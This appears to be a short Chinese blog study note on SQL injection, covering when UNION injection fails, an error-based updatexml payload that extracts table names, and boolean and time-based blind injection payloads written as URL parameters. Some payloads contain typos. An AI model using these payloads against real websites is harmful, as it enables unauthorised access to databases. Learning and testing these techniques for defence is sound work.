4.SQL注入-错误注入与盲注

一.Union查询注入不使用的地方

1.注入语句无法截断，且不清楚完整的SQL查询语句；

2.页面不能返回查询信息的时候；

3.Web页面中有两个SQL查询语句，查询语句的列数不同；

 

二.关于MySQL处理XML

1.先准备以下XML内容

?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name) 
from information_schma.tables,0x7e),1)

 

三.盲注

没有回显的时候

1.Boolean型注入

?id=1 and  length(database())=5

?id=1 and (select substr(database(),1,1)='l')

2.时间型注入

?id=1 and if(length(database())=5,sleep(2),1);

?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);

 

标签：语句,database,查询,SQL,盲注,id,select,注入
来源： https://www.cnblogs.com/eveplw/p/16538155.html